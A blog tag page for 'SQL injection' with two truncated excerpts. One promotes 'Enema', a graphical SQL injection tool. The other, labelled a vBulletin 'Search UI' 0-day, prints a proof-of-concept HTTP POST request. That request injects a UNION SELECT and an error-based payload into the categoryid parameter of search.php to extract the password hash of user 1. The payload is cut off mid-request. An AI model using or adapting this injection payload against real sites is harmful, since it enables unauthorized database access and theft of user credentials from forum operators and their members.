Tagged: SQL injection

Enema – tool for SQL injection

Enema is not autohacking software. This is dynamic tool for people, who knows what to do. Not supported old database versions (e. g. mysql 4.x). Development targeted to modern versions. Features: Multi-platform. User-friendly graphical...


vBulletin "Search UI" SQL Injection 0-day – part II

vBulletin “Search UI” SQL Injection PoC: [cc lang=”html”]POST /search.php?do=process HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select...